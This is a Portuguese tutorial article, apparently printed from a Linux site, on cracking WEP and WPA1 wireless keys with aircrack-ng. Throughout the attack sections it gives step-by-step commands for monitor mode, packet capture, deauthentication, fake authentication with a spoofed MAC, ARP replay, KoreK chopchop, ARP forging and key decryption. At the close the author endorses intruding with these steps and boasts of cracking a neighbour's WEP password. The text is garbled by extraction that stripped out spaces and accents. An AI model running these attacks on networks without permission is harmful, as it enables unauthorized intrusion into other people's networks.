27/12/12

Aircrack-ng e sua famlia para quebrar WEP e WPA1 [Artigo]

AircrackngesuafamliaparaquebrarWEPeWPA1
Autor:MarcelloBontempoSalgueiro<mbsalgueiroatlinuxmail.org> Data:31/01/2008 Comeando Paraquemnuncaviuoutemcuriosidadedeaprenderumpoucomaissobreredewireless,sugiroque buscamaisinformaesnolinkabaixo: http://www.warchalking.com.br Poisnelehumabomcaminhoparaaprendersobreredewireless,defesaeataqueebastante interessante! Bom,vamoscomearnossoartigo: Primeiro:Todososarquivosdecapturadepacotesdevemteraseguinteextenso:*.cap,*.ivs. Segundo:Vamosinstalaroaircrackng:usoDebianecreioquenasoutrasdistrodevemvircomo pacoteporpadronogerenciadordearquivosdadistro(nocasododebianslike,aptitudeouaptget,no GentooemergeenoRedHadlikeyum,eassimvai...bastavocpesquisarnoGoogle).Casovocno acheemseugerenciadordepacotes,podebaixardaneteinstalarmanualmente,segueositedoaircrack ng: http://www.aircrackng.org AIRMONNG(veminstaladocomoaircrackng): Estaaferramentaparacolocarmosnossaplacaderedewirelessnoestadomonitor!Devemosfazerisso antesdecomearacapturarpacotesdaredewireless. Faamososeguintecomandocomorootouadministrador: airmonng<start|stop><interface>[channel] Onde: <start|stop>iniciaouparademonitorar <interface>suainterfacederedeex.:ethX,rawX,athX,etc

www.vivaolinux.com.br/artigos/impressora.php?codigo=7711

1/9

27/12/12

Aircrack-ng e sua famlia para quebrar WEP e WPA1 [Artigo]

[channel]ocanalquesuaplacaderedewirelessirtrabalhar Beleza,feitoissovamosparaosegundotpico!

Capturadepacotes Pronto,agoracomsuaplacaderedemonitorandoaredewirelesspresenteporperto,vamosparauma parteimportantedequebraderedewireless...acapturadospacotestransmitidospeloprotocolo802.11! Usaremosaseguinteferramentaquetambmvemcomaircrackng,quesechama: AIRODUMPNG Suaprincipalfinalidadecapturarecoletarivs(InitializationVectors)dospacotesWEP,paraqueaps coletadosusaremosaferramentachamadaaircrackngparasabermosqualchaveessepacoteWEPque capturamosestusando. OBS:CasonoseucomputadorajaalgumreceptorGPS,oairodumpngirmostraroposicionamentoem coordenadas,queseencontraoAccessPointquevocestcoletandopacotes...legalno?! Usandooairodumpngcomoroot: airodumpng<options><interfaces> <interfaces>interfacesdasuaplacaderede(ethX,athX,rawX,wifiX,etc) Suas<options>so: ivs:Somentecapturarivs gpsd:UsarumdispositivoGPS,casotenha write:Criaumarquivocomonomeescolhidoecomaextenso(*.capou*.ivs)ecomeaa capturar w:omesmoquewrite beacons:Guardaosbeacons(noguardadoporpadro) channelouc:Especificaumcanalparaacaptura a:Capturanafrequnciade5GhzespecficadabandaA abg:Capturatantoemfrequnciasde2,4Ghzcomoem5Ghz. Bom,porpadrooairodumpngcapturapacotesdentrodoscanaisqueseencontramnafrequnciade 2.4GHz. Capturandoeescrevendonoarquivoteste.ivs,nocanal11,nasfrequnciasentre2.45GHzecoma interfacedaplacaderedewireless:

www.vivaolinux.com.br/artigos/impressora.php?codigo=7711

2/9

27/12/12

Aircrack-ng e sua famlia para quebrar WEP e WPA1 [Artigo]

#airodumpngivswteste.ivsc11abgath0 Capturadepacotescomarquivoteste.cap,nocanal11,nasfrequnciasentre2.45GHzecoma interfacedaplacaderedewireless: #airodumpngwteste.capc11abgath0 OprogramaairodumpngoscilaentreWEPeWAP,quandoosuaplacanorejeitapacotescorrompidos. Oairodumpngirmostraissonoterminal:

Vamosentendlosagora:

PS.:Lamento,estemespanholmasdparaentender...eufiqueicompreguiadetraduzir=))))))) hehehe!

Atacandoaredewireless Depoisdecapturadosopacotesdarede,vamosveragoracomoatacararedewirelesscomaseguinte ferramenta,quetambmvemcomoaircrackng.

www.vivaolinux.com.br/artigos/impressora.php?codigo=7711

3/9

27/12/12

Aircrack-ng e sua famlia para quebrar WEP e WPA1 [Artigo]

AIREPLAYNG: Hcincomaneirasdiferentesdeatacarcomoaireplayng,oprogramaaireplayngclassificadaseguinte maneira: 0:Desautenticao 1:Autentificaofalsa 2:Seleointerativadopacoteaenviar 3:ReinjeoderequisioARP 4:Ochamado"chopchop"deKoreK(predicodeCRC),poiseleutilizaessaclassificaocomo refernciaparaoataque!

Ataquezero
FazcomqueousurioconectadoaoAP(AccessPoint)desautentiqueevolteaconectar,fazendoassim queelefaaumanovarequisioARPeenviarumnovohandshake.Nesteataquepodemosutilizar vriasmaneiras: CapturarHandshakeWPA: #aireplayng05aMACdoAPcMACdoClient<interface> ReinjeoARP(ataque3): #aireplayng010aMACdoAP<interface> (faztodososusuriosconectadosaoAPcaremparanovarequisioARP) #aireplayng3bMACdoAPhMACdoClient<interface> (reinjeodospacotesobtidos) Rejeitarqueoclienteseconecte: #aireplayng00aMACdoAP<interface> (todososclientesconectadosaoAP) #aireplayng00aMACdoAPcMACdoCliente<interface> (somenteumcliente)

www.vivaolinux.com.br/artigos/impressora.php?codigo=7711

4/9

27/12/12

Aircrack-ng e sua famlia para quebrar WEP e WPA1 [Artigo]

Ataqueum
EsteataquefuncionacomxitoquandotemosumclienteconectadoaoAP,casonotenha,faremosuma clienteparaconectaraesseAP.Maslembrese,melhorquandotemosumaclienteconectadoaoAP, poisassimgeraremostrfegoARP. VamosmudaronossoMAC: #ifconfig<interface>down #ifconfig<interface>hwether00:11:22:33:44:55 #ifconfig<interface>up Agoravamosatacar: #aireplayng10eSeuESSIDaMACdoAPh00:11:22:33:44:55<interface> Sedercertoapareceralgoassim: 12:14:06SendingAuthenticationRequest 12:14:06Authenticationsuccessful 12:14:06SendingAssociationRequest 12:14:07Associationsuccessful:) ComoalgunsAPspodemrequererautenticaodetantosemtantossegundos,oaireplayngconsegue fazerissodaseguintemaneira: #aireplayng1<QntdeSegundos>eSeuESSIDFalsoaMACdoAPh00:11:22:33:44:55 <interface> Casoesteataquenosejabemsucedido(aireplaycontinuaenviandopacotesdepedidodeautenticao), podeserqueestejausandofiltrodeMACAddress.Verifiqueoseguintetambm: Estcomocontroladorcorretamenteinstaladoecomospatchesdevidamenteaplicados. AplacawirelessestconfiguradanomesmocanalqueoAccessPoint. OBSSIDeoESSID(opesa/e)soascorretas.SeforPrism2,verifiqueseofirmwareest atualizado. Algumasplacasderedessuportamassociareinjetar/monitoraratravsdainterface<interface>Xraw, porissotalvezvocprecisefazer: #ifconfig<interface>downhwether00:11:22:33:44:55 #iwconfig<interface>modeManagedessid'thessid'keyAAAAAAAAAA #ifconfig<interface>up #sysctlwdev.<interface>.rawdev=1(Criao<interface>Xraw)
www.vivaolinux.com.br/artigos/impressora.php?codigo=7711 5/9

27/12/12

Aircrack-ng e sua famlia para quebrar WEP e WPA1 [Artigo]

#sysctlwdev.<interface>.rawdev=1(Criao<interface>Xraw) #ifconfig<interface>rawup #airodumpng<interface>rawout6 EntovocpoderusarosATAQUES3e4(oaireplayngsubstituio<interface>pela<interface>raw quecriamoscasosuaplacaprecise). #aireplayng3h00:11:22:33:44:55bMACdoAP<interface>(ATAQUE3) #aireplayng4h00:10:20:30:40:50f1<interface>(ATAQUE4)

Ataquedois
Peodesculpas,masesteataquedoiseunoentendimuitobem...voutentarfalarmaisomenosoqueeu capturei...casoalgumsaiba,favorpostarumcomentrioparameajudaraentendereaosoutros!!! VLWWWWW. Elepodeselecionarumpacotequalquereenvilo... #aireplayng2bMACdoAPn100p0841hMACdoClientcMACdoAP<interface> hehehehe=D

Ataquetrs
OfamosoataquedereinjeodederequisioARPomaisefetivoparagerarIVs,efuncionamuito bem!!!=)EsteataquerequerumMACdeumclienteassociadoouumMACfalsocomomontamosno ATAQUE1!Esteataquepodedemorarbastanteee...atqueapareaarequisioARP,elefalhar rapidamentesenohouvertrfego. ComousamosnoATAQUE1: #aireplayng3h00:11:22:33:44:55bMACdoAP<interface> Apareceroseguinte: SavingARPrequestsinreplay_arp0627121526.cap Youmustalsostartairodumptocapturereplies. Read2493packets(got1ARPrequests),sent1305packets...

Ataquequatro
www.vivaolinux.com.br/artigos/impressora.php?codigo=7711 6/9

27/12/12

Aircrack-ng e sua famlia para quebrar WEP e WPA1 [Artigo]

Ataquenomeadode"chopchop"deKoreK,esteataquetimoquandobemsucedido,poisele desencriptaumpacoteWEPsemconhecerasuachaveetambmpodeusarumaWEPdinmica. PelooqueeuliesseataquenorecuperaachaveWEP,elesrevelaemtextoplano.AlgunsAPsno sotovulnerveisassim.Outrosparecematdemais(vulnerveis)pelofatofatodejogaremospacotes menoresque60bytes. Oaireplayngconsegueadivinharorestopacotes,quesomenoresque42bytes,quesojogadospelos APs,assimqueoheadertornarsepredictvel. Primeiro,decriptamosumpacote: #aireplayng4<interface> SenofuncionarporqueoAPprecisadeumMACespecficofiltradonesteAP.Assim,termosque usarumMACdeumclienteestconectadonoAP: #aireplayng4hMACdoCLiente<interface> SegundoolharemosoIP: #tcpdumps0nerreplay_dec0627022301.cap Apareceralgoassim: readingfromfilereplay_dec0627022301.cap,linktype[...] IP192.168.1.2>192.168.1.255:icmp64:echorequestseq1 Agora,forjamosumarequisioARP: #arpforgengreplay_dec0627022301.xor1MACdoClienteMACdoAP192.168.1.100 192.168.1.2arp.cap AfaixadeIPinicial(192.168.1.100)noimporta,massimadedestino(192.168.1.2). ReenviandooARPforjado: #aireplayng2rarp.capath0 Uhullllloconeh!!?!?! Vamosparaofinal,quefalasobrecomodecriptarachavecapturada.

Decriptandoaschavesdospacotescapturados...(FIM) Vamosutilizaraferramenta:

www.vivaolinux.com.br/artigos/impressora.php?codigo=7711

7/9

27/12/12

Aircrack-ng e sua famlia para quebrar WEP e WPA1 [Artigo]

AIRDECAPNG ServeparadecriptarachaveWEP/WPA1quefoicapturadanoarquivo.cap. airdecapng[opes] Asopes:

PS:Tambmnoestotraduzidas...masdparaentenderhehehehe!!!=DDDD Segueoexemplo: #airdecapngb00:09:5B:10:BC:5Aopennetwork.cap #airdecapngw11A3E229084349BC25D97E2939wep.cap #airdecapnge'thessid'ppassphrasetkip.cap Bomissopessoall,seguemunslinksdesitesmuitosbons... http://hwagm.elhacker.net http://www.warchalking.com.br http://www.mundowifi.com.br http://www.aircrackng.org Falgalera...esperoquetenhamgostadodotutoriall...noficouunsdosmelhoresexplicados,masfoi maisoumenosassimqueaprendiegostariadecompartilharcomvocsessaferramenta. Ah,epodeusarestetutoparainvadirtambmquefunciona,euquebreiasenhawepdomeuvizinho... sequiseremaprendermaisleiam,hmuitacoisananeteminglseespanhol.Divirtamseeabraoa todosssshehehe=) Esetiveremmaisinformaes,favornodeixemdepostaraquiouemoutroartigo!!!Fuiiiiiiii. Meuemailestatualizadoagora.

www.vivaolinux.com.br/artigos/impressora.php?codigo=7711

8/9

27/12/12

Aircrack-ng e sua famlia para quebrar WEP e WPA1 [Artigo]

http://www.vivaolinux.com.br/artigo/AircrackngesuafamiliaparaquebrarWEPeWPA1 Voltarparaosite

www.vivaolinux.com.br/artigos/impressora.php?codigo=7711

9/9